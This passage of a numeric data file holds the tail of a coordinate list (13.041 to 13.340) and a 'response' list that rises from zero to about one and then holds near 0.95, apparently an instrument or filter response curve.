13.041, 13.042, 13.043, 13.044, 13.045, 13.046, 13.047, 13.048, 13.049,
13.050, 13.051, 13.052, 13.053, 13.054, 13.055, 13.056, 13.057, 13.058,
13.059, 13.060, 13.061, 13.062, 13.063, 13.064, 13.065, 13.066, 13.067,
13.068, 13.069, 13.070, 13.071, 13.072, 13.073, 13.074, 13.075, 13.076,
13.077, 13.078, 13.079, 13.080, 13.081, 13.082, 13.083, 13.084, 13.085,
13.086, 13.087, 13.088, 13.089, 13.090, 13.091, 13.092, 13.093, 13.094,
13.095, 13.096, 13.097, 13.098, 13.099, 13.100, 13.101, 13.102, 13.103,
13.104, 13.105, 13.106, 13.107, 13.108, 13.109, 13.110, 13.111, 13.112,
13.113, 13.114, 13.115, 13.116, 13.117, 13.118, 13.119, 13.120, 13.121,
13.122, 13.123, 13.124, 13.125, 13.126, 13.127, 13.128, 13.129, 13.130,
13.131, 13.132, 13.133, 13.134, 13.135, 13.136, 13.137, 13.138, 13.139,
13.140, 13.141, 13.142, 13.143, 13.144, 13.145, 13.146, 13.147, 13.148,
13.149, 13.150, 13.151, 13.152, 13.153, 13.154, 13.155, 13.156, 13.157,
13.158, 13.159, 13.160, 13.161, 13.162, 13.163, 13.164, 13.165, 13.166,
13.167, 13.168, 13.169, 13.170, 13.171, 13.172, 13.173, 13.174, 13.175,
13.176, 13.177, 13.178, 13.179, 13.180, 13.181, 13.182, 13.183, 13.184,
13.185, 13.186, 13.187, 13.188, 13.189, 13.190, 13.191, 13.192, 13.193,
13.194, 13.195, 13.196, 13.197, 13.198, 13.199, 13.200, 13.201, 13.202,
13.203, 13.204, 13.205, 13.206, 13.207, 13.208, 13.209, 13.210, 13.211,
13.212, 13.213, 13.214, 13.215, 13.216, 13.217, 13.218, 13.219, 13.220,
13.221, 13.222, 13.223, 13.224, 13.225, 13.226, 13.227, 13.228, 13.229,
13.230, 13.231, 13.232, 13.233, 13.234, 13.235, 13.236, 13.237, 13.238,
13.239, 13.240, 13.241, 13.242, 13.243, 13.244, 13.245, 13.246, 13.247,
13.248, 13.249, 13.250, 13.251, 13.252, 13.253, 13.254, 13.255, 13.256,
13.257, 13.258, 13.259, 13.260, 13.261, 13.262, 13.263, 13.264, 13.265,
13.266, 13.267, 13.268, 13.269, 13.270, 13.271, 13.272, 13.273, 13.274,
13.275, 13.276, 13.277, 13.278, 13.279, 13.280, 13.281, 13.282, 13.283,
13.284, 13.285, 13.286, 13.287, 13.288, 13.289, 13.290, 13.291, 13.292,
13.293, 13.294, 13.295, 13.296, 13.297, 13.298, 13.299, 13.300, 13.301,
13.302, 13.303, 13.304, 13.305, 13.306, 13.307, 13.308, 13.309, 13.310,
13.311, 13.312, 13.313, 13.314, 13.315, 13.316, 13.317, 13.318, 13.319,
13.320, 13.321, 13.322, 13.323, 13.324, 13.325, 13.326, 13.327, 13.328,
13.329, 13.330, 13.331, 13.332, 13.333, 13.334, 13.335, 13.336, 13.337,
13.338, 13.339, 13.340],
'response':[
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004,
0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004,
0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004,
0.004, 0.004, 0.004, 0.004, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005,
0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005,
0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.006, 0.006, 0.006, 0.006,
0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006,
0.006, 0.006, 0.006, 0.006, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007,
0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007,
0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008,
0.008, 0.008, 0.008, 0.008, 0.008, 0.009, 0.009, 0.009, 0.009, 0.009,
0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.010,
0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010,
0.010, 0.010, 0.011, 0.011, 0.011, 0.011, 0.011, 0.011, 0.011, 0.011,
0.011, 0.011, 0.012, 0.012, 0.012, 0.012, 0.012, 0.012, 0.012, 0.012,
0.012, 0.012, 0.013, 0.013, 0.013, 0.013, 0.013, 0.013, 0.013, 0.013,
0.014, 0.014, 0.014, 0.014, 0.014, 0.014, 0.014, 0.014, 0.015, 0.015,
0.015, 0.015, 0.015, 0.015, 0.015, 0.015, 0.016, 0.016, 0.016, 0.016,
0.016, 0.016, 0.016, 0.017, 0.017, 0.017, 0.017, 0.017, 0.017, 0.018,
0.018, 0.018, 0.018, 0.018, 0.018, 0.019, 0.019, 0.019, 0.019, 0.019,
0.019, 0.020, 0.020, 0.020, 0.020, 0.020, 0.021, 0.021, 0.021, 0.021,
0.021, 0.022, 0.022, 0.022, 0.022, 0.022, 0.023, 0.023, 0.023, 0.023,
0.024, 0.024, 0.024, 0.024, 0.025, 0.025, 0.025, 0.025, 0.025, 0.026,
0.026, 0.026, 0.027, 0.027, 0.027, 0.027, 0.028, 0.028, 0.028, 0.028,
0.029, 0.029, 0.029, 0.030, 0.030, 0.030, 0.030, 0.031, 0.031, 0.031,
0.032, 0.032, 0.032, 0.033, 0.033, 0.033, 0.034, 0.034, 0.034, 0.035,
0.035, 0.035, 0.036, 0.036, 0.036, 0.037, 0.037, 0.037, 0.038, 0.038,
0.038, 0.039, 0.039, 0.040, 0.040, 0.040, 0.041, 0.041, 0.042, 0.042,
0.042, 0.043, 0.043, 0.044, 0.044, 0.045, 0.045, 0.046, 0.046, 0.046,
0.047, 0.047, 0.048, 0.048, 0.049, 0.049, 0.050, 0.050, 0.051, 0.051,
0.052, 0.052, 0.053, 0.053, 0.054, 0.055, 0.055, 0.056, 0.056, 0.057,
0.057, 0.058, 0.059, 0.059, 0.060, 0.060, 0.061, 0.062, 0.062, 0.063,
0.064, 0.064, 0.065, 0.066, 0.066, 0.067, 0.068, 0.068, 0.069, 0.070,
0.070, 0.071, 0.072, 0.073, 0.073, 0.074, 0.075, 0.076, 0.076, 0.077,
0.078, 0.079, 0.079, 0.080, 0.081, 0.082, 0.083, 0.084, 0.084, 0.085,
0.086, 0.087, 0.088, 0.089, 0.090, 0.091, 0.092, 0.093, 0.094, 0.095,
0.096, 0.097, 0.098, 0.099, 0.100, 0.101, 0.102, 0.103, 0.104, 0.105,
0.106, 0.107, 0.108, 0.109, 0.111, 0.112, 0.113, 0.114, 0.115, 0.117,
0.118, 0.119, 0.120, 0.121, 0.123, 0.124, 0.125, 0.127, 0.128, 0.129,
0.131, 0.132, 0.133, 0.135, 0.136, 0.138, 0.139, 0.140, 0.142, 0.143,
0.145, 0.146, 0.148, 0.149, 0.151, 0.153, 0.154, 0.156, 0.157, 0.159,
0.161, 0.162, 0.164, 0.166, 0.167, 0.169, 0.171, 0.173, 0.174, 0.176,
0.178, 0.180, 0.182, 0.183, 0.185, 0.187, 0.189, 0.191, 0.193, 0.195,
0.197, 0.199, 0.201, 0.203, 0.205, 0.207, 0.209, 0.211, 0.214, 0.216,
0.218, 0.220, 0.222, 0.224, 0.227, 0.229, 0.231, 0.234, 0.236, 0.238,
0.241, 0.243, 0.245, 0.248, 0.250, 0.253, 0.255, 0.258, 0.260, 0.263,
0.265, 0.268, 0.270, 0.273, 0.276, 0.278, 0.281, 0.284, 0.286, 0.289,
0.292, 0.295, 0.297, 0.300, 0.303, 0.306, 0.309, 0.312, 0.315, 0.318,
0.320, 0.323, 0.326, 0.329, 0.332, 0.335, 0.339, 0.342, 0.345, 0.348,
0.351, 0.354, 0.357, 0.360, 0.364, 0.367, 0.370, 0.373, 0.376, 0.380,
0.383, 0.386, 0.390, 0.393, 0.396, 0.400, 0.403, 0.407, 0.410, 0.413,
0.417, 0.420, 0.424, 0.427, 0.431, 0.434, 0.438, 0.441, 0.445, 0.448,
0.452, 0.456, 0.459, 0.463, 0.466, 0.470, 0.474, 0.477, 0.481, 0.485,
0.488, 0.492, 0.496, 0.499, 0.503, 0.507, 0.511, 0.514, 0.518, 0.522,
0.525, 0.529, 0.533, 0.537, 0.540, 0.544, 0.548, 0.552, 0.555, 0.559,
0.563, 0.567, 0.570, 0.574, 0.578, 0.582, 0.585, 0.589, 0.593, 0.597,
0.600, 0.604, 0.608, 0.612, 0.615, 0.619, 0.623, 0.626, 0.630, 0.634,
0.637, 0.641, 0.645, 0.648, 0.652, 0.656, 0.659, 0.663, 0.666, 0.670,
0.674, 0.677, 0.681, 0.684, 0.688, 0.691, 0.695, 0.698, 0.702, 0.705,
0.709, 0.712, 0.715, 0.719, 0.722, 0.726, 0.729, 0.732, 0.736, 0.739,
0.742, 0.745, 0.749, 0.752, 0.755, 0.758, 0.761, 0.765, 0.768, 0.771,
0.774, 0.777, 0.780, 0.783, 0.786, 0.789, 0.792, 0.795, 0.798, 0.801,
0.804, 0.807, 0.810, 0.812, 0.815, 0.818, 0.821, 0.823, 0.826, 0.829,
0.832, 0.834, 0.837, 0.839, 0.842, 0.845, 0.847, 0.850, 0.852, 0.854,
0.857, 0.859, 0.862, 0.864, 0.866, 0.869, 0.871, 0.873, 0.875, 0.878,
0.880, 0.882, 0.884, 0.886, 0.888, 0.890, 0.892, 0.894, 0.896, 0.898,
0.900, 0.902, 0.904, 0.906, 0.908, 0.910, 0.912, 0.913, 0.915, 0.917,
0.919, 0.920, 0.922, 0.924, 0.925, 0.927, 0.928, 0.930, 0.931, 0.933,
0.934, 0.936, 0.937, 0.939, 0.940, 0.941, 0.943, 0.944, 0.945, 0.947,
0.948, 0.949, 0.951, 0.952, 0.953, 0.954, 0.955, 0.956, 0.957, 0.959,
0.960, 0.961, 0.962, 0.963, 0.964, 0.965, 0.966, 0.967, 0.968, 0.968,
0.969, 0.970, 0.971, 0.972, 0.973, 0.974, 0.974, 0.975, 0.976, 0.977,
0.977, 0.978, 0.979, 0.980, 0.980, 0.981, 0.982, 0.982, 0.983, 0.983,
0.984, 0.985, 0.985, 0.986, 0.986, 0.987, 0.987, 0.988, 0.988, 0.989,
0.989, 0.990, 0.990, 0.991, 0.991, 0.992, 0.992, 0.992, 0.993, 0.993,
0.993, 0.994, 0.994, 0.994, 0.995, 0.995, 0.995, 0.996, 0.996, 0.996,
0.996, 0.997, 0.997, 0.997, 0.997, 0.998, 0.998, 0.998, 0.998, 0.998,
0.998, 0.999, 0.999, 0.999, 0.999, 0.999, 0.999, 0.999, 0.999, 0.999,
1.000, 1.000, 1.000, 1.000, 1.000, 1.000, 1.000, 1.000, 1.000, 1.000,
1.000, 1.000, 1.000, 1.000, 1.000, 1.000, 1.000, 1.000, 1.000, 1.000,
1.000, 1.000, 1.000, 1.000, 0.999, 0.999, 0.999, 0.999, 0.999, 0.999,
0.999, 0.999, 0.999, 0.999, 0.999, 0.998, 0.998, 0.998, 0.998, 0.998,
0.998, 0.998, 0.997, 0.997, 0.997, 0.997, 0.997, 0.997, 0.996, 0.996,
0.996, 0.996, 0.996, 0.996, 0.995, 0.995, 0.995, 0.995, 0.995, 0.994,
0.994, 0.994, 0.994, 0.994, 0.993, 0.993, 0.993, 0.993, 0.993, 0.992,
0.992, 0.992, 0.992, 0.991, 0.991, 0.991, 0.991, 0.990, 0.990, 0.990,
0.990, 0.990, 0.989, 0.989, 0.989, 0.989, 0.988, 0.988, 0.988, 0.988,
0.987, 0.987, 0.987, 0.987, 0.986, 0.986, 0.986, 0.986, 0.985, 0.985,
0.985, 0.985, 0.984, 0.984, 0.984, 0.983, 0.983, 0.983, 0.983, 0.982,
0.982, 0.982, 0.982, 0.981, 0.981, 0.981, 0.981, 0.980, 0.980, 0.980,
0.980, 0.979, 0.979, 0.979, 0.979, 0.978, 0.978, 0.978, 0.978, 0.977,
0.977, 0.977, 0.977, 0.976, 0.976, 0.976, 0.976, 0.975, 0.975, 0.975,
0.975, 0.974, 0.974, 0.974, 0.974, 0.973, 0.973, 0.973, 0.973, 0.972,
0.972, 0.972, 0.972, 0.971, 0.971, 0.971, 0.971, 0.970, 0.970, 0.970,
0.970, 0.969, 0.969, 0.969, 0.969, 0.968, 0.968, 0.968, 0.967, 0.967,
0.967, 0.967, 0.966, 0.966, 0.966, 0.966, 0.965, 0.965, 0.965, 0.965,
0.964, 0.964, 0.964, 0.963, 0.963, 0.963, 0.963, 0.962, 0.962, 0.962,
0.962, 0.961, 0.961, 0.961, 0.960, 0.960, 0.960, 0.960, 0.959, 0.959,
0.959, 0.959, 0.958, 0.958, 0.958, 0.958, 0.957, 0.957, 0.957, 0.956,
0.956, 0.956, 0.956, 0.956, 0.955, 0.955, 0.955, 0.955, 0.954, 0.954,
0.954, 0.954, 0.954, 0.953, 0.953, 0.953, 0.953, 0.953, 0.953, 0.953,
0.952, 0.952, 0.952, 0.952, 0.952, 0.952, 0.952, 0.952, 0.952, 0.951,
0.951, 0.951, 0.951, 0.951, 0.951, 0.951, 0.951, 0.951, 0.951, 0.951,
0.951, 0.951, 0.951, 0.951, 0.951, 0.951, 0.951, 0.951, 0.951, 0.951,
0.951, 0.952, 0.952, 0.952, 0.952, 0.952, 0.952, 0.952, 0.952, 0.952,
0.952, 0.952, 0.952, 0.952, 0.953, 0.953, 0.953, 0.953, 0.953, 0.953,
0.953, 0.953, 0.953, 0.953, 0.954, 0.954, 0.954, 0.954, 0.954, 0.954,
0.954, 0.954, 0.954, 0.955, 0.955, 0.955, 0.955, 0.955, 0.955, 0.955,
0.955, 0.955, 0.956, 0.956, 0.956, 0.956, 0.956, 0.956, 0.956, 0.956,
0.956, 0.956, 0.957, 0.957, 0.957, 0.957, 0.957, 0.957, 0.957, 0.957,
0.957, 0.957, 0.958, 0.958, 0.958, 0.958, 0.958, 0.958, 0.958, 0.958,
0.958, 0.958, 0.958, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959,
0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.960, 0.960, 0.960, 0.960,
0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960,
0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.961, 0.961,
0.961, 0.961, 0.961, 0.961, 0.961, 0.961, 0.961, 0.961, 0.961, 0.961,
0.961, 0.961, 0.961, 0.961, 0.961, 0.961, 0.961, 0.961, 0.960, 0.960,
0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960,
0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.959,
0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959,
0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959,
0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959,
0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959,
0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959,
0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959,
0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960,
0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.960, 0.959,
0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959,
0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.959, 0.958, 0.958, 0.958,
0.958, 0.958, 0.958, 0.958, 0.958, 0.958, 0.958, 0.958, 0.957, 0.957,
0.957, 0.957, 0.957, 0.957, 0.957, 0.957, 0.957, 0.956, 0.956, 0.956,
0.956, 0.956, 0.956, 0.956, 0.956, 0.956, 0.956, 0.955, 0.955, 0.955,
0.955, 0.955, 0.955, 0.955, 0.955, 0.955, 0.954, 0.954, 0.954, 0.954,
0.954, 0.954, 0.954, 0.954, 0.954, 0.953, 0.953, 0.953, 0.953, 0.953,
0.953, 0.953, 0.953, 0.952, 0.952, 0.952, 0.952, 0.952, 0.952, 0.952,
0.952, 0.952, 0.951, 0.951, 0.951, 0.951, 0.951, 0.951, 0.951, 0.951,
0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.949, 0.949,
0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.948, 0.948, 0.948, 0.948,
0.948, 0.948, 0.948, 0.948, 0.947, 0.947, 0.947, 0.947, 0.947, 0.947,
0.947, 0.947, 0.947, 0.946, 0.946, 0.946, 0.946, 0.946, 0.946, 0.946,
0.946, 0.946, 0.946, 0.945, 0.945, 0.945, 0.945, 0.945, 0.945, 0.945,
0.945, 0.945, 0.945, 0.945, 0.945, 0.945, 0.945, 0.944, 0.944, 0.944,
0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944,
0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944,
0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944,
0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944,
0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944,
0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944,
0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944,
0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944,
0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944, 0.944,
0.944, 0.944, 0.944, 0.944, 0.945, 0.945, 0.945, 0.945, 0.945, 0.945,
0.945, 0.945, 0.945, 0.945, 0.945, 0.945, 0.945, 0.945, 0.945, 0.945,
0.945, 0.945, 0.945, 0.945, 0.945, 0.945, 0.945, 0.945, 0.945, 0.946,
0.946, 0.946, 0.946, 0.946, 0.946, 0.946, 0.946, 0.946, 0.946, 0.946,
0.946, 0.946, 0.946, 0.946, 0.946, 0.946, 0.946, 0.946, 0.946, 0.946,
0.946, 0.946, 0.947, 0.947, 0.947, 0.947, 0.947, 0.947, 0.947, 0.947,
0.947, 0.947, 0.947, 0.947, 0.947, 0.947, 0.947, 0.947, 0.947, 0.947,
0.947, 0.947, 0.947, 0.947, 0.947, 0.947, 0.948, 0.948, 0.948, 0.948,
0.948, 0.948, 0.948, 0.948, 0.948, 0.948, 0.948, 0.948, 0.948, 0.948,
0.948, 0.948, 0.948, 0.948, 0.948, 0.948, 0.948, 0.948, 0.948, 0.948,
0.948, 0.948, 0.948, 0.948, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949,
0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949,
0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949,
0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949,
0.949, 0.949, 0.949, 0.949, 0.949, 0.949, 0.950, 0.950, 0.950, 0.950,
0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950,
0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950,
0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950,
0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950, 0.950,
0.950, 0.950, 0.950, 0.950, 0.949, 0.949, 0.949, 0.949, 0.949, 0.949,
0.949, 0.949, 0.949, 0.949, 0.948, 0.948, 0.948, 0.948, 0.948, 0.948,
0.947, 0.947, 0.947, 0.947, 0.947, 0.946, 0.946, 0.946, 0.946, 0.945,
0.945, 0.945, 0.945, 0.944, 0.944, 0.944, 0.943, 0.943, 0.943, 0.942,
0.942, 0.942, 0.941, 0.941, 0.940, 0.940, 0.939, 0.939, 0.939, 0.938,
0.938, 0.937, 0.937, 0.936, 0.936, 0.935, 0.935, 0.934, 0.934, 0.933,
0.932, 0.932, 0.931, 0.931, 0.930, 0.930, 0.929, 0.928, 0.928, 0.927,
0.926, 0.926, 0.925, 0.925, 0.924, 0.923, 0.923, 0.922, 0.921, 0.921,
0.920, 0.919, 0.919, 0.918, 0.917, 0.917, 0.916, 0.915, 0.915, 0.914,
0.914, 0.913, 0.912, 0.912, 0.911, 0.911, 0.910, 0.909, 0.909, 0.908,
0.908, 0.907, 0.907, 0.906, 0.906, 0.905, 0.905, 0.904, 0.904, 0.904,
0.903, 0.903, 0.902, 0.902, 0.902, 0.901, 0.901, 0.901, 0.901, 0.900,
0.900, 0.900, 0.900, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899,
0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899,
0.899, 0.899, 0.899, 0.899, 0.900, 0.900, 0.900, 0.900, 0.900, 0.901,
0.901, 0.901, 0.901, 0.902, 0.902, 0.902, 0.902, 0.903, 0.903, 0.903,
0.904, 0.904, 0.905, 0.905, 0.905, 0.906, 0.906, 0.907, 0.907, 0.907,
0.908, 0.908, 0.909, 0.909, 0.910, 0.910, 0.911, 0.911, 0.912, 0.912,
0.913, 0.913, 0.914, 0.914, 0.915, 0.915, 0.916, 0.916, 0.917, 0.917,
0.918, 0.919, 0.919, 0.920, 0.920, 0.921, 0.921, 0.922, 0.923, 0.923,
0.924, 0.924, 0.925, 0.926, 0.926, 0.927, 0.928, 0.928, 0.929, 0.929,
0.930, 0.931, 0.931, 0.932, 0.933, 0.933, 0.934, 0.934, 0.935, 0.936,
0.936, 0.937, 0.938, 0.938, 0.939, 0.939, 0.940, 0.941, 0.941, 0.942,
0.942, 0.943, 0.944, 0.944, 0.945, 0.945, 0.946, 0.946, 0.947, 0.947,
0.948, 0.948, 0.949, 0.949, 0.950, 0.950, 0.951, 0.951, 0.952, 0.952,
0.953, 0.953, 0.954, 0.954, 0.955, 0.955, 0.955, 0.956, 0.956, 0.957,
0.957, 0.957, 0.958, 0.958, 0.958, 0.959, 0.959, 0.959, 0.960, 0.960,
0.960, 0.960, 0.961, 0.961, 0.961, 0.961, 0.962, 0.962, 0.962, 0.962,
0.962, 0.962, 0.963, 0.963, 0.963, 0.963, 0.963, 0.963, 0.963, 0.964,
0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964,
